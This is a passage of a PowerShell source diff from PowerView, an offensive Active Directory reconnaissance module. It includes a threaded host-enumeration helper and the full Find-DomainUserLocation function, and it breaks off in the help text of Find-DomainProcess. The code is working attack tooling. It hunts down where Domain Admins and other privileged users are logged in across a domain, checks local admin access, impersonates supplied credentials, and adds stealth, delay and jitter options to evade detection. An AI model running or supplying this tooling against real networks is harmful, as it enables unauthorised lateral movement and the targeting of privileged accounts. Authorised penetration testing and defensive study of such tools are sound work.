} + } + + $SearcherArguments['Path'] = $TargetPath + Get-ChildItem @SearcherArguments | ForEach-Object { + # check if we're excluding folders + $Continue = $True + if ($PSBoundParameters['ExcludeFolders'] -and ($_.PSIsContainer)) { + Write-Verbose "Excluding: $($_.FullName)" + $Continue = $False + } + if ($LastAccessTime -and ($_.LastAccessTime -lt $LastAccessTime)) { + $Continue = $False + } + if ($PSBoundParameters['LastWriteTime'] -and ($_.LastWriteTime -lt $LastWriteTime)) { + $Continue = $False + } + if ($PSBoundParameters['CreationTime'] -and ($_.CreationTime -lt $CreationTime)) { + $Continue = $False + } + if ($PSBoundParameters['CheckWriteAccess'] -and (-not (Test-Write -Path $_.FullName))) { + $Continue = $False + } + if ($Continue) { + $FileParams = @{ + 'Path' = $_.FullName + 'Owner' = $((Get-Acl $_.FullName).Owner) + 'LastAccessTime' = $_.LastAccessTime + 'LastWriteTime' = $_.LastWriteTime + 'CreationTime' = $_.CreationTime + 'Length' = $_.Length + } + $FoundFile = New-Object -TypeName PSObject -Property $FileParams + $FoundFile.PSObject.TypeNames.Insert(0, 'PowerView.FoundFile') + $FoundFile + } + } + } + } + + END { + # remove the IPC$ mappings + $MappedComputers.Keys | Remove-RemoteConnection + } +} + + +######################################################## +# +# 'Meta'-functions start below +# +######################################################## + +function New-ThreadedFunction { + # Helper used by any threaded host enumeration functions + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [String[]] + $ComputerName, + + [Parameter(Position = 1, Mandatory = $True)] + [System.Management.Automation.ScriptBlock] + $ScriptBlock, + + [Parameter(Position = 2)] + [Hashtable] + $ScriptParameters, + + [Int] + [ValidateRange(1, 100)] + $Threads = 20, + + [Switch] + $NoImports + ) + + BEGIN { + # Adapted from: + # http://powershell.org/wp/forums/topic/invpke-parallel-need-help-to-clone-the-current-runspace/ + $SessionState = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault() + + # # $SessionState.ApartmentState = [System.Threading.Thread]::CurrentThread.GetApartmentState() + # force a single-threaded apartment state (for token-impersonation stuffz) + $SessionState.ApartmentState = [System.Threading.ApartmentState]::STA + + # import the current session state's variables and functions so the chained PowerView + # functionality can be used by the threaded blocks + if (-not $NoImports) { + # grab all the current variables for this runspace + $MyVars = Get-Variable -Scope 2 + + # these Variables are added by Runspace.Open() Method and produce Stop errors if you add them twice + $VorbiddenVars = @('?','args','ConsoleFileName','Error','ExecutionContext','false','HOME','Host','input','InputObject','MaximumAliasCount','MaximumDriveCount','MaximumErrorCount','MaximumFunctionCount','MaximumHistoryCount','MaximumVariableCount','MyInvocation','null','PID','PSBoundParameters','PSCommandPath','PSCulture','PSDefaultParameterValues','PSHOME','PSScriptRoot','PSUICulture','PSVersionTable','PWD','ShellId','SynchronizedHash','true') + + # add Variables from Parent Scope (current runspace) into the InitialSessionState + ForEach ($Var in $MyVars) { + if ($VorbiddenVars -NotContains $Var.Name) { + $SessionState.Variables.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateVariableEntry -ArgumentList $Var.name,$Var.Value,$Var.description,$Var.options,$Var.attributes)) + } + } + + # add Functions from current runspace to the InitialSessionState + ForEach ($Function in (Get-ChildItem Function:)) { + $SessionState.Commands.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList $Function.Name, $Function.Definition)) + } + } + + # threading adapted from + # https://github.com/darkoperator/Posh-SecMod/blob/master/Discovery/Discovery.psm1#L407 + # Thanks Carlos! + + # create a pool of maxThread runspaces + $Pool = [RunspaceFactory]::CreateRunspacePool(1, $Threads, $SessionState, $Host) + $Pool.Open() + + # do some trickery to get the proper BeginInvoke() method that allows for an output queue + $Method = $Null + ForEach ($M in [PowerShell].GetMethods() | Where-Object { $_.Name -eq 'BeginInvoke' }) { + $MethodParameters = $M.GetParameters() + if (($MethodParameters.Count -eq 2) -and $MethodParameters[0].Name -eq 'input' -and $MethodParameters[1].Name -eq 'output') { + $Method = $M.MakeGenericMethod([Object], [Object]) + break + } + } + + $Jobs = @() + $ComputerName = $ComputerName | Where-Object {$_ -and $_.Trim()} + Write-Verbose "[New-ThreadedFunction] Total number of hosts: $($ComputerName.count)" + + # partition all hosts from -ComputerName into $Threads number of groups + if ($Threads -ge $ComputerName.Length) { + $Threads = $ComputerName.Length + } + $ElementSplitSize = [Int]($ComputerName.Length/$Threads) + $ComputerNamePartitioned = @() + $Start = 0 + $End = $ElementSplitSize + + for($i = 1; $i -le $Threads; $i++) { + $List = New-Object System.Collections.ArrayList + if ($i -eq $Threads) { + $End = $ComputerName.Length + } + $List.AddRange($ComputerName[$Start..($End-1)]) + $Start += $ElementSplitSize + $End += $ElementSplitSize + $ComputerNamePartitioned += @(,@($List.ToArray())) + } + + Write-Verbose "[New-ThreadedFunction] Total number of threads/partitions: $Threads" + + ForEach ($ComputerNamePartition in $ComputerNamePartitioned) { + # create a "powershell pipeline runner" + $PowerShell = [PowerShell]::Create() + $PowerShell.runspacepool = $Pool + + # add the script block + arguments with the given computer partition + $Null = $PowerShell.AddScript($ScriptBlock).AddParameter('ComputerName', $ComputerNamePartition) + if ($ScriptParameters) { + ForEach ($Param in $ScriptParameters.GetEnumerator()) { + $Null = $PowerShell.AddParameter($Param.Name, $Param.Value) + } + } + + # create the output queue + $Output = New-Object Management.Automation.PSDataCollection[Object] + + # kick off execution using the BeginInvok() method that allows queues + $Jobs += @{ + PS = $PowerShell + Output = $Output + Result = $Method.Invoke($PowerShell, @($Null, [Management.Automation.PSDataCollection[Object]]$Output)) + } + } + } + + END { + Write-Verbose "[New-ThreadedFunction] Threads executing" + + # continuously loop through each job queue, consuming output as appropriate + Do { + ForEach ($Job in $Jobs) { + $Job.Output.ReadAll() + } + Start-Sleep -Seconds 1 + } + While (($Jobs | Where-Object { -not $_.Result.IsCompleted }).Count -gt 0) + + $SleepSeconds = 100 + Write-Verbose "[New-ThreadedFunction] Waiting $SleepSeconds seconds for final cleanup..." + + # cleanup- make sure we didn't miss anything + for ($i=0; $i -lt $SleepSeconds; $i++) { + ForEach ($Job in $Jobs) { + $Job.Output.ReadAll() + $Job.PS.Dispose() + } + Start-Sleep -S 1 + } + + $Pool.Dispose() + Write-Verbose "[New-ThreadedFunction] all threads completed" + } +} + + +function Find-DomainUserLocation { +<# +.SYNOPSIS + +Finds domain machines where specific users are logged into. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainFileServer, Get-DomainDFSShare, Get-DomainController, Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetSession, Test-AdminAccess, Get-NetLoggedon, Resolve-IPAddress, New-ThreadedFunction + +.DESCRIPTION + +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and queries the domain for users of a specified group +(default 'Domain Admins') with Get-DomainGroupMember. Then for each server the +function enumerates any active user sessions with Get-NetSession/Get-NetLoggedon +The found user list is compared against the target list, and any matches are +displayed. If -ShowAll is specified, all results are displayed instead of +the filtered set. If -Stealth is specified, then likely highly-trafficed servers +are enumerated with Get-DomainFileServer/Get-DomainController, and session +enumeration is executed only against those servers. If -Credential is passed, +then Invoke-UserImpersonation is used to impersonate the specified user +before enumeration, reverting after with Invoke-RevertToSelf. + +.PARAMETER ComputerName + +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +.PARAMETER Domain + +Specifies the domain to query for computers AND users, defaults to the current domain. + +.PARAMETER ComputerDomain + +Specifies the domain to query for computers, defaults to the current domain. + +.PARAMETER ComputerLDAPFilter + +Specifies an LDAP query string that is used to search for computer objects. + +.PARAMETER ComputerSearchBase + +Specifies the LDAP source to search through for computers, +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. + +.PARAMETER ComputerUnconstrained + +Switch. Search computer objects that have unconstrained delegation. + +.PARAMETER ComputerOperatingSystem + +Search computers with a specific operating system, wildcards accepted. + +.PARAMETER ComputerServicePack + +Search computers with a specific service pack, wildcards accepted. + +.PARAMETER ComputerSiteName + +Search computers in the specific AD Site name, wildcards accepted. + +.PARAMETER UserIdentity + +Specifies one or more user identities to search for. + +.PARAMETER UserDomain + +Specifies the domain to query for users to search for, defaults to the current domain. + +.PARAMETER UserLDAPFilter + +Specifies an LDAP query string that is used to search for target users. + +.PARAMETER UserSearchBase + +Specifies the LDAP source to search through for target users. +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. + +.PARAMETER UserGroupIdentity + +Specifies a group identity to query for target users, defaults to 'Domain Admins. +If any other user specifications are set, then UserGroupIdentity is ignored. + +.PARAMETER UserAdminCount + +Switch. Search for users users with '(adminCount=1)' (meaning are/were privileged). + +.PARAMETER UserAllowDelegation + +Switch. Search for user accounts that are not marked as 'sensitive and not allowed for delegation'. + +.PARAMETER CheckAccess + +Switch. Check if the current user has local admin access to computers where target users are found. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain and target systems. + +.PARAMETER StopOnSuccess + +Switch. Stop hunting after finding after finding a target user. + +.PARAMETER Delay + +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +.PARAMETER Jitter + +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +.PARAMETER ShowAll + +Switch. Return all user location results instead of filtering based on target +specifications. + +.PARAMETER Stealth + +Switch. Only enumerate sessions from connonly used target servers. + +.PARAMETER StealthSource + +The source of target servers to use, 'DFS' (distributed file servers), +'DC' (domain controllers), 'File' (file servers), or 'All' (the default). + +.PARAMETER Threads + +The number of threads to use for user searching, defaults to 20. + +.EXAMPLE + +Find-DomainUserLocation + +Searches for 'Domain Admins' by enumerating every computer in the domain. + +.EXAMPLE + +Find-DomainUserLocation -Stealth -ShowAll + +Enumerates likely highly-trafficked servers, performs just session enumeration +against each, and outputs all results. + +.EXAMPLE + +Find-DomainUserLocation -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local + +Enumerates Windows 7 computers in dev.testlab.local and returns user results for privileged +users in dev.testlab.local. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainUserLocation -Domain testlab.local -Credential $Cred + +Searches for domain admin locations in the testlab.local using the specified alternate credentials. + +.OUTPUTS + +PowerView.UserLocation +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.UserLocation')] + [CmdletBinding(DefaultParameterSetName = 'UserGroupIdentity')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DNSHostName')] + [String[]] + $ComputerName, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerDomain, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerLDAPFilter, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerSearchBase, + + [Alias('Unconstrained')] + [Switch] + $ComputerUnconstrained, + + [ValidateNotNullOrEmpty()] + [Alias('OperatingSystem')] + [String] + $ComputerOperatingSystem, + + [ValidateNotNullOrEmpty()] + [Alias('ServicePack')] + [String] + $ComputerServicePack, + + [ValidateNotNullOrEmpty()] + [Alias('SiteName')] + [String] + $ComputerSiteName, + + [Parameter(ParameterSetName = 'UserIdentity')] + [ValidateNotNullOrEmpty()] + [String[]] + $UserIdentity, + + [ValidateNotNullOrEmpty()] + [String] + $UserDomain, + + [ValidateNotNullOrEmpty()] + [String] + $UserLDAPFilter, + + [ValidateNotNullOrEmpty()] + [String] + $UserSearchBase, + + [Parameter(ParameterSetName = 'UserGroupIdentity')] + [ValidateNotNullOrEmpty()] + [Alias('GroupName', 'Group')] + [String[]] + $UserGroupIdentity = 'Domain Admins', + + [Alias('AdminCount')] + [Switch] + $UserAdminCount, + + [Alias('AllowDelegation')] + [Switch] + $UserAllowDelegation, + + [Switch] + $CheckAccess, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $StopOnSuccess, + + [ValidateRange(1, 10000)] + [Int] + $Delay = 0, + + [ValidateRange(0.0, 1.0)] + [Double] + $Jitter = .3, + + [Parameter(ParameterSetName = 'ShowAll')] + [Switch] + $ShowAll, + + [Switch] + $Stealth, + + [String] + [ValidateSet('DFS', 'DC', 'File', 'All')] + $StealthSource = 'All', + + [Int] + [ValidateRange(1, 100)] + $Threads = 20 + ) + + BEGIN { + + $ComputerSearcherArguments = @{ + 'Properties' = 'dnshostname' + } + if ($PSBoundParameters['Domain']) { $ComputerSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain } + if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter } + if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase } + if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained } + if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem } + if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack } + if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName } + if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential } + + $UserSearcherArguments = @{ + 'Properties' = 'samaccountname' + } + if ($PSBoundParameters['UserIdentity']) { $UserSearcherArguments['Identity'] = $UserIdentity } + if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['UserDomain']) { $UserSearcherArguments['Domain'] = $UserDomain } + if ($PSBoundParameters['UserLDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $UserLDAPFilter } + if ($PSBoundParameters['UserSearchBase']) { $UserSearcherArguments['SearchBase'] = $UserSearchBase } + if ($PSBoundParameters['UserAdminCount']) { $UserSearcherArguments['AdminCount'] = $UserAdminCount } + if ($PSBoundParameters['UserAllowDelegation']) { $UserSearcherArguments['AllowDelegation'] = $UserAllowDelegation } + if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential } + + $TargetComputers = @() + + # first, build the set of computers to enumerate + if ($PSBoundParameters['ComputerName']) { + $TargetComputers = @($ComputerName) + } + else { + if ($PSBoundParameters['Stealth']) { + Write-Verbose "[Find-DomainUserLocation] Stealth enumeration using source: $StealthSource" + $TargetComputerArrayList = New-Object System.Collections.ArrayList + + if ($StealthSource -match 'File|All') { + Write-Verbose '[Find-DomainUserLocation] Querying for file servers' + $FileServerSearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $FileServerSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['ComputerDomain']) { $FileServerSearcherArguments['Domain'] = $ComputerDomain } + if ($PSBoundParameters['ComputerSearchBase']) { $FileServerSearcherArguments['SearchBase'] = $ComputerSearchBase } + if ($PSBoundParameters['Server']) { $FileServerSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $FileServerSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $FileServerSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $FileServerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $FileServerSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $FileServerSearcherArguments['Credential'] = $Credential } + $FileServers = Get-DomainFileServer @FileServerSearcherArguments + if ($FileServers -isnot [System.Array]) { $FileServers = @($FileServers) } + $TargetComputerArrayList.AddRange( $FileServers ) + } + if ($StealthSource -match 'DFS|All') { + Write-Verbose '[Find-DomainUserLocation] Querying for DFS servers' + # # TODO: fix the passed parameters to Get-DomainDFSShare + # $ComputerName += Get-DomainDFSShare -Domain $Domain -Server $DomainController | ForEach-Object {$_.RemoteServerName} + } + if ($StealthSource -match 'DC|All') { + Write-Verbose '[Find-DomainUserLocation] Querying for domain controllers' + $DCSearcherArguments = @{ + 'LDAP' = $True + } + if ($PSBoundParameters['Domain']) { $DCSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['ComputerDomain']) { $DCSearcherArguments['Domain'] = $ComputerDomain } + if ($PSBoundParameters['Server']) { $DCSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $DCSearcherArguments['Credential'] = $Credential } + $DomainControllers = Get-DomainController @DCSearcherArguments | Select-Object -ExpandProperty dnshostname + if ($DomainControllers -isnot [System.Array]) { $DomainControllers = @($DomainControllers) } + $TargetComputerArrayList.AddRange( $DomainControllers ) + } + $TargetComputers = $TargetComputerArrayList.ToArray() + } + else { + Write-Verbose '[Find-DomainUserLocation] Querying for all computers in the domain' + $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname + } + } + Write-Verbose "[Find-DomainUserLocation] TargetComputers length: $($TargetComputers.Length)" + if ($TargetComputers.Length -eq 0) { + throw '[Find-DomainUserLocation] No hosts found to enumerate' + } + + # get the current user so we can ignore it in the results + if ($PSBoundParameters['Credential']) { + $CurrentUser = $Credential.GetNetworkCredential().UserName + } + else { + $CurrentUser = ([Environment]::UserName).ToLower() + } + + # now build the user target set + if ($PSBoundParameters['ShowAll']) { + $TargetUsers = @() + } + elseif ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount'] -or $PSBoundParameters['UserAllowDelegation']) { + $TargetUsers = Get-DomainUser @UserSearcherArguments | Select-Object -ExpandProperty samaccountname + } + else { + $GroupSearcherArguments = @{ + 'Identity' = $UserGroupIdentity + 'Recurse' = $True + } + if ($PSBoundParameters['UserDomain']) { $GroupSearcherArguments['Domain'] = $UserDomain } + if ($PSBoundParameters['UserSearchBase']) { $GroupSearcherArguments['SearchBase'] = $UserSearchBase } + if ($PSBoundParameters['Server']) { $GroupSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $GroupSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $GroupSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $GroupSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $GroupSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $GroupSearcherArguments['Credential'] = $Credential } + $TargetUsers = Get-DomainGroupMember @GroupSearcherArguments | Select-Object -ExpandProperty MemberName + } + + Write-Verbose "[Find-DomainUserLocation] TargetUsers length: $($TargetUsers.Length)" + if ((-not $ShowAll) -and ($TargetUsers.Length -eq 0)) { + throw '[Find-DomainUserLocation] No users found to target' + } + + # the host enumeration block we're using to enumerate all servers + $HostEnumBlock = { + Param($ComputerName, $TargetUsers, $CurrentUser, $Stealth, $TokenHandle) + + if ($TokenHandle) { + # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation + $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet + } + + ForEach ($TargetComputer in $ComputerName) { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer + if ($Up) { + $Sessions = Get-NetSession -ComputerName $TargetComputer + ForEach ($Session in $Sessions) { + $UserName = $Session.UserName + $CName = $Session.CName + + if ($CName -and $CName.StartsWith('\\')) { + $CName = $CName.TrimStart('\') + } + + # make sure we have a result, and ignore computer$ sessions + if (($UserName) -and ($UserName.Trim() -ne '') -and ($UserName -notmatch $CurrentUser) -and ($UserName -notmatch '\$$')) { + + if ( (-not $TargetUsers) -or ($TargetUsers -contains $UserName)) { + $UserLocation = New-Object PSObject + $UserLocation | Add-Member Noteproperty 'UserDomain' $Null + $UserLocation | Add-Member Noteproperty 'UserName' $UserName + $UserLocation | Add-Member Noteproperty 'ComputerName' $TargetComputer + $UserLocation | Add-Member Noteproperty 'SessionFrom' $CName + + # try to resolve the DNS hostname of $Cname + try { + $CNameDNSName = [System.Net.Dns]::GetHostEntry($CName) | Select-Object -ExpandProperty HostName + $UserLocation | Add-Member NoteProperty 'SessionFromName' $CnameDNSName + } + catch { + $UserLocation | Add-Member NoteProperty 'SessionFromName' $Null + } + + # see if we're checking to see if we have local admin access on this machine + if ($CheckAccess) { + $Admin = (Test-AdminAccess -ComputerName $CName).IsAdmin + $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin + } + else { + $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Null + } + $UserLocation.PSObject.TypeNames.Insert(0, 'PowerView.UserLocation') + $UserLocation + } + } + } + if (-not $Stealth) { + # if we're not 'stealthy', enumerate loggedon users as well + $LoggedOn = Get-NetLoggedon -ComputerName $TargetComputer + ForEach ($User in $LoggedOn) { + $UserName = $User.UserName + $UserDomain = $User.LogonDomain + + # make sure wet have a result + if (($UserName) -and ($UserName.trim() -ne '')) { + if ( (-not $TargetUsers) -or ($TargetUsers -contains $UserName) -and ($UserName -notmatch '\$$')) { + $IPAddress = @(Resolve-IPAddress -ComputerName $TargetComputer)[0].IPAddress + $UserLocation = New-Object PSObject + $UserLocation | Add-Member Noteproperty 'UserDomain' $UserDomain + $UserLocation | Add-Member Noteproperty 'UserName' $UserName + $UserLocation | Add-Member Noteproperty 'ComputerName' $TargetComputer + $UserLocation | Add-Member Noteproperty 'IPAddress' $IPAddress + $UserLocation | Add-Member Noteproperty 'SessionFrom' $Null + $UserLocation | Add-Member Noteproperty 'SessionFromName' $Null + + # see if we're checking to see if we have local admin access on this machine + if ($CheckAccess) { + $Admin = Test-AdminAccess -ComputerName $TargetComputer + $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin + } + else { + $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Null + } + $UserLocation.PSObject.TypeNames.Insert(0, 'PowerView.UserLocation') + $UserLocation + } + } + } + } + } + } + + if ($TokenHandle) { + Invoke-RevertToSelf + } + } + + $LogonToken = $Null + if ($PSBoundParameters['Credential']) { + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + else { + $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet + } + } + } + + PROCESS { + # only ignore threading if -Delay is passed + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + + Write-Verbose "[Find-DomainUserLocation] Total number of hosts: $($TargetComputers.count)" + Write-Verbose "[Find-DomainUserLocation] Delay: $Delay, Jitter: $Jitter" + $Counter = 0 + $RandNo = New-Object System.Random + + ForEach ($TargetComputer in $TargetComputers) { + $Counter = $Counter + 1 + + # sleep for our semi-randomized interval + Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) + + Write-Verbose "[Find-DomainUserLocation] Enumerating server $Computer ($Counter of $($TargetComputers.Count))" + Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $TargetUsers, $CurrentUser, $Stealth, $LogonToken + + if ($Result -and $StopOnSuccess) { + Write-Verbose "[Find-DomainUserLocation] Target user found, returning early" + return + } + } + } + else { + Write-Verbose "[Find-DomainUserLocation] Using threading with threads: $Threads" + Write-Verbose "[Find-DomainUserLocation] TargetComputers length: $($TargetComputers.Length)" + + # if we're using threading, kick off the script block with New-ThreadedFunction + $ScriptParams = @{ + 'TargetUsers' = $TargetUsers + 'CurrentUser' = $CurrentUser + 'Stealth' = $Stealth + 'TokenHandle' = $LogonToken + } + + # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params + New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Find-DomainProcess { +<# +.SYNOPSIS + +Searches for processes on the domain using WMI, returning processes +that match a particular user specification or process name. + +Thanks to @paulbrandau for the approach idea. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Get-WMIProcess, New-ThreadedFunction + +.DESCRIPTION + +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and queries the domain for users of a specified group +(default 'Domain Admins') with Get-DomainGroupMember. Then for each server the +function enumerates any current processes running with Get-WMIProcess, +searching for processes running under any target user contexts or with the +specified -ProcessName. If -Credential is passed, it is passed through to +the underlying WMI commands used to enumerate the remote machines. + +.PARAMETER ComputerName + +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +.PARAMETER Domain + +Specifies the domain to query for computers AND users, defaults to the current domain. + +.PARAMETER ComputerDomain + +Specifies the domain to query for computers, defaults to the current domain. + +.PARAMETER ComputerLDAPFilter + +Specifies an LDAP query string that is used to search for computer objects. + +.PARAMETER ComputerSearchBase + +Specifies the LDAP source to search through for computers, +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. + +.PARAMETER ComputerUnconstrained + +Switch. Search computer objects that have unconstrained delegation. + +.PARAMETER ComputerOperatingSystem + +Search computers with a specific operating system, wildcards accepted. + +.PARAMETER ComputerServicePack + +Search computers with a specific service pack, wildcards accepted. + +.PARAMETER ComputerSiteName + +Search computers in the specific AD Site name, wildcards accepted. + +.PARAMETER ProcessName + +Search for processes with one or more specific names. + +.PARAMETER UserIdentity + +Specifies one or more user identities to search for. + +.PARAMETER UserDomain + +Specifies the domain to query for users to search for, defaults to the current domain. + +.PARAMETER UserLDAPFilter + +Specifies an LDAP query string that is used to search for target users. + +.PARAMETER UserSearchBase + +Specifies the LDAP source to search through for target users. +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. + +.PARAMETER UserGroupIdentity + +Specifies a group identity to query for target users, defaults to 'Domain Admins. +If any other user specifications are set, then UserGroupIdentity is ignored. + +.PARAMETER UserAdminCount + +Switch. Search for users users with '(adminCount=1)' (meaning are/were privileged). + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain and target systems. + +.PARAMETER StopOnSuccess + +Switch. Stop hunting after finding after finding a target user. + +.PARAMETER Delay + +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +.PARAMETER Jitter + +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +.PARAMETER Threads + +The number of threads to use for user searching, defaults to 20. + +.EXAMPLE + +Find-DomainProcess + +Searches for processes run by 'Domain Admins' by enumerating every computer in the domain. + +.EXAMPLE + +Find-DomainProcess -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local + +Enumerates Windows 7 computers in dev.testlab.local and returns any processes being run by +privileged users in dev.testlab.local. + +.EXAMPLE + +Find-DomainProcess -ProcessName putty.exe + +Searchings for 